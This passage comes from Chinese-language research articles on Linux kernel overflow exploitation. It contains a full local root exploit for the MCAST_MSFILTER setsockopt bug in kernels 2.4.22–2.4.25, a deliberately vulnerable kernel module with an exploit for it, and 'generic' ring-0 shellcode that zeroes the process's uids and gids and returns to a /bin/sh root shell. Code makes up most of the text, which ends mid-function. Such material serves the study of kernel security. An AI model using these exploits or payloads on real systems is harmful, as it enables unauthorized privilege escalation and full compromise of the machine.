slabinfo的支持,我们也还有另外一个方法。通常我们可以假设当前系统的slab对象分配尽后,此尺寸的slab
对象的数量并不会达到系统上限(通常都是这样,我还未遇到例外的情况),所以我们可以一直消耗slab对象到
系统上限,这个我们可以通过函数的返回值判断出来,然后我们从尾部的slab对象中释放两个连续对象供我们
的溢出使用,由于前面的假设,所以我们分配的尾部的slab对象一定是在一个新的slab块中,所以它们一定是
相邻的。

3、关于特性三

在kmalloc/slab的特性部分我们提到了三个特性,其中第三个特性在前面并没有被引用。这是因为在本文介绍
的例子中并不需要这个特性,但是在真实漏洞的利用中你也许会用得到。

4、关于isec-0015-msfilter漏洞的利用

本来想拿isec-0015-msfilter的漏洞做一个实例分析,但是想了想解释这个漏洞的利用会引入很多内容(比如进程
权限的提升、漏洞触发的具体条件和一些“讨厌”的约束),那会把这篇文章弄的很复杂,太多的内容会对理解
kmalloc利用的基本技术造成障碍。

顺便说一下,如果你研究了isec-0015-msfilter内核漏洞,你也许会发现由于漏洞触发环境的各种约束,可以覆盖
的有价值的数据结构很少,甚至只能找到一些数据的读写地址供覆盖,最后可能只有通过拦截系统调用的方法来提
升权限,而我们知道在有的环境下无法在应用层准确的得到sys_call_table的地址。不过我们后来想到我们可以将
前面提到的“得到相邻slab对象”技术用到溢出数据源本身,这样可以突破漏洞本身对溢出数据源长度的限制,进
而可以覆盖任意的通过kmalloc分配地址的数据结构了,就不再需要sys_call_table了。

六、** 最后

感觉写paper总是比写代码更难,有时解决一个技术问题不易,但是描述和解释一个技术问题却更难,
所以如果文章哪里写的不清楚,存在什么问题,请大家指出和谅解。最后,希望能有更多的交流。

七、** 参考资料

1 Linux内核情景分析

2 kmalloc_exploition.pdf

3 isec-0015-msfilter http://isec.pl

4 内核源代码参考 http://lxr.linux.no

八、** 附录 (kexp-msfilter.c)

下面是isec-0015-msfilter内核漏洞的利用代码,虽然这不是一个通用版本,但是足够作为一个kmalloc exploitation
的真实例子了。

/*
* Linux kernel setsockopt MCAST_MSFILTER privilege elevation
* For kernel 2.4.22 - 2.4.25
*
* 2006-04-07
* Written by grip2
*
* grip2@debian:~/kernel-sec/exp-msfilter$ ./kexp-msfilter
* numsrc: 0x4000000c msize: 0x40 gsize: 0x68c optlen: 0x68c
* Prepare ...
* full_numsrc: 15 overflow_numsrc: 3
* size-64 87 118 64 2 2 1
* size-64 119 177 64 3 3 1
* Exploiting ...
* setsockopt: Cannot assign requested address
* sh-2.05b#
**/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define KB * 1024
#define MB * 1024 KB
#define GB * 1024 MB
#define NOP 'A'
int uid, gid;
unsigned task_size;
unsigned user_cs,user_ds;

void **sys_call_table;
#define __NR_hijack_getroot 0
static inline _syscall1(int, hijack_getroot, unsigned long *, val)

#define SOL_IP 0
#define MY_NUMSRC 12

#define SIZE_PIPE_INODE_INFO 64 /* sizeof(struct pipe_inode_info) */
#define SLAB_SIZE (fix_slabsize(SIZE_PIPE_INODE_INFO))

#define MAX_SEM_LIMIT 4096
static int sem_handles[MAX_SEM_LIMIT];
static int sem_count = 0;

/*
* (kernel-2.4.22) -- ipc/sem.c
* ...
* size = sizeof (*sma) + nsems * sizeof (struct sem);
* sma = (struct sem_array *) ipc_alloc(size);
* ...
*/
#define COMPUTE_NSEMS(slabsize) (((fix_slabsize(slabsize)) - 56) / 8);

/*
 * Round a requested size up to the object size of the general-purpose
 * cache that would serve it, using the size table of kernel 2.4.22
 * (powers of two from 64 to 131072, plus 32 when PAGE_SIZE is 4096).
 *
 * slabsize: requested size in bytes.
 * Returns the smallest table entry that is >= slabsize; a request larger
 * than every entry is returned unchanged.
 *
 * The parameter is now declared as int explicitly: the former
 * identifier-only parameter list relied on implicit int, which C99 and
 * later do not allow.
 */
static int fix_slabsize(int slabsize)
{
    /*
     * (kernel-2.4.22)
     **/
    static const int cache_sizes[] = {
#if PAGE_SIZE == 4096
        32,
#endif
        64,
        128,
        256,
        512,
        1024,
        2048,
        4096,
        8192,
        16384,
        32768,
        65536,
        131072,
    };
    const int num = sizeof(cache_sizes)/sizeof(cache_sizes[0]);
    int i;

    for (i = 0; i < num; i++) {
        if (cache_sizes[i] >= slabsize)
            return cache_sizes[i];
    }

    return slabsize;
}

unsigned long get_sys_call_table(void)
{
FILE *fp;
char linebuf[128];
char stuff[64];
unsigned long addr;
int found = 0;
int r;

fp = fopen("/proc/ksyms", "r");
if (fp == NULL) {
perror("fopen /proc/ksyms");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

memset(stuff, 0 ,sizeof(stuff));
r = sscanf(linebuf, "%x %s", &addr, stuff);
if (r != 2 || !strstr(stuff, "sys_call_table"))
continue;

printf(linebuf);
found = 1;
break;
}

fclose(fp);
return found ? addr : 0;
}

static void prepare_slab(int slabsize, int left)
{
FILE *fp;
char linebuf[128];
int r, found = 0;
int s_size, s_active, s_total;
int nsems;

slabsize = fix_slabsize(slabsize);
nsems = COMPUTE_NSEMS(slabsize);

fp = fopen("/proc/slabinfo", "r");
if (fp == NULL) {
perror("fopen /proc/slabinfo");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

r = sscanf(linebuf, "size-%d %d %d", &s_size, &s_active, &s_total);
if (r != 3 || s_size != slabsize)
continue;

printf(linebuf);
found = 1;
break;
}
fclose(fp);

if (found) {
int i, num;

num = s_total - s_active - left;
num = (num <= (MAX_SEM_LIMIT-sem_count)) ? num : (MAX_SEM_LIMIT-sem_count);
for (i = sem_count; i < num; i++, sem_count++) {
sem_handles[i] = semget(IPC_PRIVATE, nsems, IPC_CREAT);
}
}

return;
}

static void de_prepare_slab()
{
int i;

for (i = 0; i < sem_count; i++) {
if (sem_handles[i] != -1)
if (semctl(sem_handles[i], 0, IPC_RMID)) perror("ipc_rmid");
}
sem_count = 0;
}

void shellcode(void)
{
char *p[] ={"/bin/sh", 0};
// de_prepare_slab();
execve("/bin/sh",p,0);
_exit(0);
}

void configure(void)
{
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
uid = getuid();
gid = getgid();
user_ds = myget_ds();
user_cs = myget_cs();

}
void kernel(unsigned * task)
{
unsigned * addr = task;

/* looking for uids */
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++;

addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}

void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;

int cntr;
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}

int myget_cs()
{
__asm__("movl %cs,%eax\n");
}
int myget_ds()
{
__asm__("movl %ds,%eax\n");
}

/*
* kernel 2.4.x/2.6.x privilege elevator
**/
extern load_highlevel;
__asm__
(
"load_highlevel: \n\t"
"mov $0xffffe000,%eax\n\t"
"and %esp,%eax \n\t"
"pushl %eax \n\t"
"call set_root \n\t"
"pop %eax \n\t"
"cli \n\t"
"movl $user_ds,%eax \n\t"
"pushl (%eax)\n"
"pop %ds \n\t" /* DS */
"pushl %ds \n\t" /* SS */
"pushl $0xc0000000 \n\t" /* ESP */
"pushl $0x246 \n\t" /* EFLAGS */
"movl $user_cs,%eax \n\t" /* CS */
"pushl (%eax) \n\t"
"pushl $shellcode \n\t"
"iret \n\t"
);

int main(int argc, char *argv[])
{
int sock = -1;
int victim_pipe[2] = {-1, -1};
int holderid = -1;
struct group_filter *gsf = NULL; /* &optval */
int optlen, optlen_align;
int nsems;
int pid;
int status;

unsigned int numsrc, full_numsrc, of_numsrc /* overflow numsrc */;
int msize, gsize, i;
struct sockaddr_in *psin;

sys_call_table = (void *) get_sys_call_table();
if (!sys_call_table)
goto err;

sock = socket(PF_INET, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
goto err;
}

optlen = sizeof(struct group_filter) +
sizeof(struct sockaddr_storage) * (MY_NUMSRC-1);
optlen_align = fix_slabsize(optlen);
/*
* (kernel-2.4.22)
* ...
* define IP_MSFILTER_SIZE(numsrc) \
* (sizeof(struct ip_msfilter) - sizeof(__u32) \
* + (numsrc) * sizeof(__u32))
*/
numsrc = ((4 - (sizeof(struct ip_msfilter) - 4)))/4 + (SLAB_SIZE - 4)/4;
msize = IP_MSFILTER_SIZE(numsrc);
gsize = GROUP_FILTER_SIZE(numsrc);
printf("numsrc: 0x%x msize: 0x%x gsize: 0x%x optlen: 0x%x\n",
numsrc, msize, gsize, optlen);

if (argc == 2 && !strcmp(argv[1], "-w"))
exit(EXIT_SUCCESS);

gsf = malloc(optlen_align);
if (gsf == NULL) {
perror("malloc");
goto err;
}
memset(gsf, 'A', optlen);

/*
* Prepare
**/
printf("Prepare ...\n");
gsf->gf_numsrc = numsrc;
gsf->gf_interface = 0;
gsf->gf_fmode = 0;
psin = (struct sockaddr_in *) &gsf->gf_group;
psin->sin_family = AF_INET;

for (i = 0; i < MY_NUMSRC; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x43434343;
}

full_numsrc = (optlen_align - sizeof(struct group_filter))
/ sizeof(gsf->gf_slist[0]) + 1 + 1;
of_numsrc = full_numsrc
- ((SLAB_SIZE - 20 /* sizeof(struct ip_msfilter) */) / 4 + 1);
printf("full_numsrc: %d \toverflow_numsrc: %d\n", full_numsrc, of_numsrc);

for (; i < full_numsrc; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x44444444;
}
assert(of_numsrc == 3);
psin = (struct sockaddr_in *) &gsf->gf_slist[full_numsrc-of_numsrc-1+3]; /* char *base */
psin->sin_addr.s_addr = (unsigned int) &sys_call_table[__NR_hijack_getroot];

setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen_align);
prepare_slab(SLAB_SIZE, -1);
prepare_slab(SLAB_SIZE, 4);

nsems = COMPUTE_NSEMS(SLAB_SIZE);
holderid = semget(IPC_PRIVATE, nsems, IPC_CREAT);
if (holderid == -1) {
perror("semget IPC_NEW");
goto err;
}

if (pipe(victim_pipe) == -1) {
perror("pipe");
goto err;
}

semctl(holderid, 0, IPC_RMID);
printf("Exploiting ...\n");
semctl(holderid, 0, IPC_RMID);
if (setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen) == -1)
perror("setsockopt");

/*
* Get root
**/
char *p_load_highlevel = (void *) &load_highlevel;
if (fork() == 0)
{
int cnt;
alarm(1);
cnt = write(victim_pipe[1], &p_load_highlevel, 4);
if (cnt == -1) {
perror("write pipe");
goto err;
}
exit(0);
}
sleep(2);

if ((pid = fork()) == 0) {
configure();
hijack_getroot(0);

printf("Failed to get root!\n");
_exit(-1);
}

while (1) {
if (waitpid(pid, &status, 0) < 0)
break;
}

de_prepare_slab();
free(gsf);
close(sock);

close(victim_pipe[0]);
close(victim_pipe[1]);
return EXIT_SUCCESS;
err:
if (victim_pipe[0] > 0) {
close(victim_pipe[0]);
close(victim_pipe[1]);
}

de_prepare_slab(); /* it's safe */

if (holderid != -1)
semctl(holderid, 0, IPC_RMID);
if (gsf)
free(gsf);
if (sock != -1)
close(sock);
return EXIT_FAILURE;
}

linux内核溢出研究系列(1)--通用shellcode篇

标题: linux内核溢出研究系列(1)--通用shellcode篇

创建: 2006-3-22
修改:2006-3-22
作者:李小军(a1rsupp1y)
---------------------------------------------------------------------------------------------------
目录:
一、简介

二、简单的例子
1)例子代码
2)利用代码

三、shellcode扩展
1)模式
2)通用思路
3)通用实现
四、参考资源
五、附录
六、感谢
--------------------------------------------------------------------------------------------------


一、简介
linux内核溢出凸显严重,利用代码的编写和普通溢出相比,难度大了很多。
几乎每一个经典的内核漏洞都有一个非常经典的利用代码值得大家深入学习。
目前可以借鉴的学习文档基本上都是英文的,于是决定对linux内核溢出利用代
码的编写进行全盘的学习。这份文档就是一个学习的过程,记录下来,希望能
和大家共同进步。

二、简单的例子
首先,研究的目标是2.6的内核版本,然后再扩展到2.4内核。我们先从一个简单
的例子代码出发,进行利用代码的编写。我们的测试平台是缺省内核的redhat as4
(2.6.9)和gentoo(2.6.15).
1)例子代码
我们的例子代码先挂载(hook)了一个系统调用,其功能就是把用户空间的数据拷贝
到内核空间,因为没有进行长度检查,导致了一个内核栈溢出。
因为2.6内核下面,没有引出sys_call_table,我们用了一个查找函数(find_systable)来找到
sys_call_table的地址。
例子代码如下:
#include
#include
#include
#include
#include
#define CALL_NR 35

static const void *lower_bound = &kernel_thread;
int *sys_call_table =0xc04eb6c0;
int (*old_call)(int, int);

static inline int looks_good(void **p)
{
if (*p <= (void*)lower_bound || *p >= (void*)p)
return 0;
return 1;
}
/*
* find sys_call_table
*/
int find_systable(void)
{
void **ptr = (void **)&init_mm;
void **limit;

sys_call_table = NULL;

for (limit = ptr + 16 * 1024;
ptr < limit && sys_call_table == NULL; ptr++)
{
int ok = 1;
int i;

for (i = 0; i < 250; i++)
if (!looks_good(ptr + i)) {
ok = 0;
ptr = ptr + i;
break;
}

if (ok) {
if (ptr[__NR_break] != ptr[__NR_ftime])
continue;
sys_call_table = ptr;
break;
}
}

if (sys_call_table == NULL) {
printk("Failed to find address of sys_call_table\n");
return -EIO;
}

printk("Found sys_call_table at 0x%.8x\n", sys_call_table);
return 0;
}

asmlinkage int test(unsigned int len,char * code) {
char buf[256];
//strcpy(buf,code);
memcpy(buf,code,len);

}
asmlinkage int new_call(unsigned int len, char * buf) {
printk("%p\n",current_thread_info());
printk("off:%d\n",(int)(current)-(int)(&current->uid));
char * code = kmalloc(len, GFP_KERNEL);

if (code ==NULL) goto out;

if (copy_from_user(code, buf, len))
goto out;

test(len,code);
out:
return 0;
}

int init_module(void)
{
int i=find_systable();
printk("[*] vuln loaded!\n");
old_call = sys_call_table[CALL_NR];
sys_call_table[CALL_NR] = new_call;
return 0;
}
void cleanup_module(void)
{
sys_call_table[CALL_NR] = old_call;
printk("[*] vuln unloaded!\n");
}

2)利用代码
针对上面的栈溢出,利用代码也很简单,就是构造超长的数据,然后调用该系统调用来传递
给内核。
利用代码如下:

/* exp.c
*/
#include
#include
#include
#include
#include
#include
#include
#define __NR_new_call 35
static inline _syscall2(int, new_call, unsigned int ,len,char * ,code);
#define NOP 'A'
//===================[ kernel 2.6* privilege elevator ]=================
//globals
int uid, gid;

extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);

void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
{ ts[0] = ts[1] = ts[4] = ts[5] = 0;
// __asm__("int3");
}

}



char *p[]={"/bin/sh"};
void sc(){
// __asm__("int3");
execve("/bin/sh",p,NULL);
exit(0);
}
//==============================================================
//==============================================================






int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
int i;
uid=getuid();
gid=getgid();
memset(code,NOP,1024);
for(i=0;i<5;i++)
memcpy(code,&load_highlevel,128);

len = 256+8+4+4;
sleep(1);
printf("code addr is:%p\n",&load_highlevel);
*(int *)(code+256+8) = (int)&load_highlevel;//eip

new_call(len,code);

}

内核栈溢出和普通栈溢出的原理是一样的,就是覆盖内核函数的返回地址,从而改
变运行的流程,在内核栈溢出里面,关键就是shellcode的功能,如何实现提升用户
权限以及如何安全返回到用户空间。所以,我们把shellcode部分提取出来进行分析。
__asm__
(
"load_highlevel: \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
上面的shellcode首先进行的是权限的提升,把进程信息里面的uid,euid和gid,egid修改为
root权限。2.6内核下面,进程信息的指针是在内核栈-8192的位置的(2.4内核下是整个
进程信息放置在该位置),所以通过"mov $0xffffe000, %eax\n" "and %esp,%eax \n"
就能找到进程信息指针的值,从内核代码我们也能看出来:
028 struct thread_info {
029 struct task_struct *task; /* main task structure */《--我们要获得的值
030 struct exec_domain *exec_domain; /* execution domain */
031 unsigned long flags; /* low level flags */
032 unsigned long status; /* thread-synchronous flags */
033 __u32 cpu; /* current CPU */
034 int preempt_count; /* 0 => preemptable, <0 => BUG */
035
036
037 mm_segment_t addr_limit; /* thread address space:
038 0-0xBFFFFFFF for user-thead
039 0-0xFFFFFFFF for kernel-thread
040 */
041 struct restart_block restart_block;
042
043 unsigned long previous_esp; /* ESP of the previous stack in case
044 of nested (IRQ) stacks
045 */
046 __u8 supervisor_stack[0];
047 };
获得进程信息的指针以后,就可以通过搜索里面的uid,euid,gid,egid,并修改为0,从而提升
到root权限。set_root实现的就是搜索修改功能。完成权限提升以后,就要实现安全返回到用户
空间,并获得shell。下面的汇编代码实现此功能:
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP ,shell函数的地址
"iret \n"

三、shellcode扩展
从前面的shellcode分析我们可以知道此shellcode有多个值是不定值,和系统是相关的,第一个
是内核栈的大小,不同的系统下面,内核栈的大小不一定相同,就会影响到$0xffffe000这个值,
一般系统的内核栈大小是8KB,对应使用$0xffffe000;有些系统的内核栈大小是4KB,这时就要使用$0xfffff000。
第二个不定值是用户DS和用户CS的值,不同的内核版本下面,使用的值不相同。第三个不定值是用户
空间大小,不同的系统下面,内存大小会影响到该值,一般的系统是0xc0000000,但是在高内存(>896MB)
的系统下面,此值就变了。

1)模式
为了写出通用的shellcode,我们首先要确定我们的shellcode模式。
我们的模式:权限提升-》安全返回-》执行shell 在此模式里面,我们要消除不定值,从而实现通用。

2)通用思路
模式确定后,我们的目标就明确了,消除所有的不定值。
a)消除内核栈大小差异
为了消除内核栈的差异,我们要想办法在内核空间里面搜索到这个值。经过一番研究后,我们把目标
确定在了system_call的实现里面,首先,我们来看看system_call的汇编代码:
0xc0102e58 : push %eax
0xc0102e59 : cld
0xc0102e5a : push %es
0xc0102e5b : push %ds
0xc0102e5c : push %eax
0xc0102e5d : push %ebp
0xc0102e5e : push %edi
0xc0102e5f : push %esi
0xc0102e60 : push %edx
0xc0102e61 : push %ecx
0xc0102e62 : push %ebx
0xc0102e63 : mov $0x7b,%edx
0xc0102e68 : movl %edx,%ds
0xc0102e6a : movl %edx,%es
0xc0102e6c : mov $0xffffe000,%ebp 《--我们的目标
0xc0102e71 : and %esp,%ebp
0xc0102e73 : testw $0x1c1,0x8(%ebp)
0xc0102e79 : jne 0xc0102f40
0xc0102e7f : cmp $0x126,%eax
0xc0102e84 : jae 0xc0102fb4
我们不难发现,system_call的实现里面有我们要的值0xffffe000,而且它的模式非常固定:前面是一条mov xx,%edx,
接下来的两条movl也是固定的。
0xc0102e63 : mov $0x7b,%edx
0xc0102e68 : movl %edx,%ds
0xc0102e6a : movl %edx,%es
0xc0102e6c : mov $0xffffe000,%ebp
这样,我们就能通过搜索内核空间来确定第一个值了。
搜索代码如下:
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
我们可以发现,在此段搜索代码里面,我们又引入了一个新的不定值$task_size,这个值我们也能通过计算获得:
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
这样,我们就消除了第一个差异
b)消除用户DS,CS差异
接着,我们要消除用户DS和CS的差异,我们通过在用户空间直接获取ds和cs的值
int myget_ds()
{

__asm__("movl %ds,%eax\n");
}
user_ds=myget_ds();

然后
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
这样就动态的获取了用户DS的值
c)消除用户空间差异
从当前栈地址开始不断向栈底方向逐字节取值,越过栈底的地址访问会导致SIGSEGV信号,然后在信号处理函数里利用长跳转回到主流程并报告当前地址,
这个地址自然就对应栈底(即stack_bottom)。
3)通用实现
现在,我们已经消除了全部的不定值,完全可以实现一个通用的shellcode了。下面这段shellcode在2.4和2.6内核
下测试通过,完全通用。
//===================[ kernel 2.6* privilege elevator ]===============================
//globals
int uid, gid;
unsigned task_size;
unsigned stack_bottom;
unsigned user_cs,user_ds;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version

" cli \n"
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
" pop %ds \n"
" pushl %ds \n" //SS
" movl $stack_bottom,%eax \n" //ESP
"pushl (%eax) \n"
" pushl $0x246 \n" //EFLAGS
"movl $user_cs,%eax \n" //DS user selector
"pushl (%eax)\n"
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
//========================================================================

四、参考资源
1)http://www.milw0rm.com/exploits/926
2)http://fanqiang.chinaunix.net/program/c++/2002-10-18/2372.shtml
3)http://www.isec.pl/papers/linux_kernel_do_brk.pdf
4)http://www.xfocus.net/projects/Xcon/2002/Xcon2002_alert7_e4gle.pdf

五、附录
1)exp.c
完整的exp代码
/* exp.c
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define __NR_new_call 35
static inline _syscall2(int, new_call, unsigned int ,len,char * ,code);
static char * get_stack_bottom ( void );
#define NOP 'A'

//===================[ kernel 2.6* privilege elevator ]===============================
//globals
int uid, gid;
unsigned task_size;
unsigned stack_bottom;
unsigned user_cs,user_ds;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version

" cli \n"
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
" pop %ds \n"
" pushl %ds \n" //SS
" movl $stack_bottom,%eax \n" //ESP
"pushl (%eax) \n"
" pushl $0x246 \n" //EFLAGS
"movl $user_cs,%eax \n" //DS user selector
"pushl (%eax)\n"
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
//=================================================================================
/*
 * Fills in the globals used by the rest of the program:
 *   task_size    - address of a local variable rounded up to the next 1 GB
 *                  multiple (the GB/MB/kB macros expand to "* 1024 ...")
 *   stack_bottom - value returned by get_stack_bottom()
 *   uid, gid     - real user and group id of the caller
 *   user_ds/cs   - values returned by myget_ds() / myget_cs()
 *
 * NOTE(review): task_size is an unsigned int but is printed with %p, which
 * expects a void *; myget_ds()/myget_cs() are called before any declaration
 * is visible in this listing.
 */
void configure(void)
{
unsigned val;
/* (addr + 1GB) / 1GB * 1GB: integer division drops the remainder */
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
printf("task_size:%p\n",task_size);
stack_bottom=(unsigned)get_stack_bottom();
uid=getuid();
gid=getgid();
user_ds=myget_ds();
user_cs=myget_cs();
//printf("%x%x\n",user_cs,user_ds);

}
/*
 * Walks a window of 32-bit words starting at ts and zeroes every group whose
 * words 0/1 equal the global uid and words 4/5 equal the global gid.
 *
 * ts: start address of the scan. If the first word at ts is non-zero it is
 *     itself treated as a pointer and the scan starts there instead.
 *
 * The loop visits 513 starting positions (cntr runs 0..512 inclusive) and
 * does not stop after the first match.
 * NOTE(review): ts is unsigned int * but is assigned from an (int *) cast;
 * the word layout being matched is an assumption about the target structure
 * that cannot be verified from this file.
 */
void set_root(unsigned int *ts)
{
/* follow one level of indirection when the first word is non-NULL */
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;
int cntr;
/* relies on the scanned fields being int-aligned */
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
{ ts[0] = ts[1] = ts[4] = ts[5] = 0;
// __asm__("int3");
}

}

/*
 * Argument vector handed to execve() by sc().
 * NOTE(review): the array holds a single element and no terminating NULL
 * entry; execve() expects a NULL-terminated argv -- confirm and fix.
 */
char *p[]={"/bin/sh"};
/*
 * Replaces the current process image with /bin/sh (environment pointer is
 * NULL). exit(0) is only reached if execve() returns, i.e. on failure.
 */
void sc(){
// __asm__("int3");
execve("/bin/sh",p,NULL);
exit(0);
}
//====================================================================================
//====================================================================================

//**************************************************************************************//
//--------------------------------find stack bottom begin-------------------------------------//
//rip from scz's code
typedef void Sigfunc ( int ); /* for signal handlers */

Sigfunc * signal ( int signo, Sigfunc * func );
static Sigfunc * Signal ( int signo, Sigfunc * func );
static char * get_stack_bottom ( void );
static void segfault ( int signo );

static sigjmp_buf jmpbuf;
static volatile sig_atomic_t canjump = 0;
static Sigfunc *seg_handler;
static Sigfunc *bus_handler; /* for xxxBSD */

/*
 * signal() replacement implemented on top of sigaction().
 *
 * Installs func as the handler for signo with an empty blocked-signal mask
 * and sa_flags == 0.
 *
 * Returns the handler that was installed before the call, or SIG_ERR when
 * sigaction() fails.
 */
Sigfunc * signal ( int signo, Sigfunc * func )
{
    struct sigaction previous;
    struct sigaction wanted;

    wanted.sa_handler = func;
    sigemptyset(&wanted.sa_mask);
    wanted.sa_flags = 0;

    return (sigaction(signo, &wanted, &previous) < 0) ? SIG_ERR
                                                       : previous.sa_handler;
}

/*
 * Checked wrapper around this file's signal().
 *
 * Terminates the process with EXIT_FAILURE when the handler cannot be
 * installed; otherwise returns the previously installed handler.
 */
static Sigfunc * Signal ( int signo, Sigfunc * func )
{
    Sigfunc *previous = signal(signo, func);

    if (previous != SIG_ERR)
    {
        return previous;
    }
    exit(EXIT_FAILURE);
}

/*
 * Probes memory upward from the address of a local variable, one byte at a
 * time, until an access raises SIGSEGV or SIGBUS.
 *
 * The segfault() handler long-jumps back to the sigsetjmp() point below; on
 * that second return the previous SIGSEGV/SIGBUS handlers are restored and
 * the address at which the access faulted is returned.
 *
 * Returns: the first address at or above &c whose read/write-back faulted.
 * The trailing return(NULL) is never reached because the probe loop has no
 * exit other than the signal.
 */
static char * get_stack_bottom ( void )
{
volatile char *c; /* for autovar, must be volatile */

/* remember the handlers that were in place so they can be put back */
seg_handler = Signal( SIGSEGV, segfault );
bus_handler = Signal( SIGBUS, segfault );

/* start probing at the address of this local variable */
c = ( char * )&c;



/* non-zero return means we arrived here via siglongjmp() from segfault() */
if ( sigsetjmp( jmpbuf, 1 ) != 0 )

{

Signal( SIGSEGV, seg_handler );
Signal( SIGBUS, bus_handler );
return( ( char * )c );

}

canjump = 1; /* jmpbuf is initialised, the handler may now siglongjmp() */

while ( 1 )
{

/* read the byte and store it back unchanged, then advance */
*c = *c;
c++;

}

return( NULL );
} /* end of get_stack_bottom */

/*
 * Handler installed by get_stack_bottom() for SIGSEGV and SIGBUS.
 *
 * When canjump is set, clears it and long-jumps to jmpbuf, passing signo as
 * the sigsetjmp() return value; control does not come back here.
 * When canjump is clear the signal was not expected and the handler simply
 * returns.
 */
static void segfault ( int signo )
{
